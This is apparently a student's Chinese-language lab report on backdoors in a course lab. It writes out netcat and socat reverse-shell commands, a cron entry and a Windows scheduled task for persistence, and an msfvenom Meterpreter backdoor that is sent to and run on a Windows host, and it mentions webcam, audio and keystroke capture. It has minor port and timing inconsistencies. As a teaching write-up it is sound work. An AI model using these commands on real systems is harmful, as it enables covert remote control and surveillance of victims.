一、实验内容

1、实验任务

(1)任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)
(2)任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)
(3)任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
(4)任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

2、基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
非官网下载的一些文件、图片、软件等,里面可能存在捆绑软件。当我们下载完东西之后,后门程序很可能已经进入了我们的系统。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
Window:修改注册表的信息,改为自启动
Linux:根据这次实验,可以通过cron来定时启动
(3)Meterpreter有哪些给你映像深刻的功能?
在获取了目标主机的shell后,就可以对目标主机进行一系列的远程操控。
(4)如何发现自己有系统有没有被安装后门?
因为平时自己也不会注意这些,只能说从理论上可以看端口的开放情况、或者一些莫名其妙的自启动项。当然还有“万能”的各种杀毒软件,不过我感觉只要杀毒软件能立刻察觉的后门、木马等等都直接查杀了,差不出来的只能说伪装的太好了。

3、准备

Windows获得Linux Shell

(1)打开Windows主机的CMD,用ipconfig查看IP:192.168.88.1

(2)打开Kali终端,用ifconfig查看IP:192.168.88.139

(3)Windows中,用监听指令ncat.exe -l -p 5328来监听本机5328端口

(4)Kali环境下,用nc Windows主机IP 5328 -e /bin/sh指令反向连接Windows主机的5328端口

(5)获得Kali的shell

Linux获得Windows Shell

(1)Kali终端中用监听指令nc -l -p 5328来监听本机65328端口
(2)Windows中,使用ncat.exe Kali主机IP 5328 -e cmd.exe指令反向连接Kali主机的5328端口
(3)发现在Kali中可以输Windows命令

传输数据

(1)Windows下监听5328端口
(2)Kali下连接到Windows的5328端口
(3)建立连接之后,可以传输数据

3、使用netcat获取主机操作Shell,cron启动

(1)在Windows系统下,用监听指令ncat.exe -l -p 5328来监听5328端口

(2)Kali下用crontab -e指令增加定时任务,在最后一行添加7 * * * * /bin/netcat 192.168.88.1 5328 -e /bin/sh,然后在每个小时的第7分钟将会反向连接Windows主机的5303端口

(3)我们会发现,当到了xx:20的时候,会获得Kali的shell

4、使用socat获取主机操作Shell, 任务计划启动

(1)在windows系统下,右击屏幕左下角windows图标,选择“计算机管理”。
(2)在任务计划程序创建任务exp2,填写任务名称,并新建一个触发器

(3)新建操作,程序或脚本选择socat.exe文件的路径,并添加参数tcp-listen:5328 exec:cmd.exe,pty,stderr

(4)Kali下输入指令socat - tcp:192.168.88.1:5328,发现已经成功获得了一个cmd shell

(5)做完之后把该任务删除

5、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(1)Kali中输入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.1 LPORT=5328 -f exe > 20175328_backdoor.exe

生成后门程序

(2)Kali上用nc 192.168.88.1 5328 < 20175328_backdoor.exe将后门程序20175328_backdoor.exe拷贝到Windows中,并用ncat.exe -lv 5328 > 20175328_backdoor.exe指令查看连接状态

(3)Kali上使用msfconsole指令进入msf控制台,设置payload、反弹回连的IP和端口

(4)Kali上开始监听
(5)Windows上运行后门程序

(6)Kali上获得Windows主机的连接,并且得到了远程控制的shell

6、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

获取命令的帮助信息:help
(1)获取目标主机的音频

(2)获取目标主机的摄像头

(3)获取目标主机的击键记录

二、实验总结

感想

做这次实验比较大的一个感想就是回到实验二开始老师让我们思考的那四个问题叭,感觉自己的一些防范意识还比较薄弱,互联网上其实各种后门、木马、病毒无处不在。希望大家都加强防范意识,好好学习相关课程,就像网络对抗技术这门课,掌握了入侵原理,才能更好的维护好我们的系统。

三、参考资料

msfconsole 控制台使用和操作
windows 下的 socat 工具下载地址和使用
Windows安装NetCat

posted on 2020-03-22 23:38  20175328李欣颖  阅读(128)  评论(0编辑  收藏  举报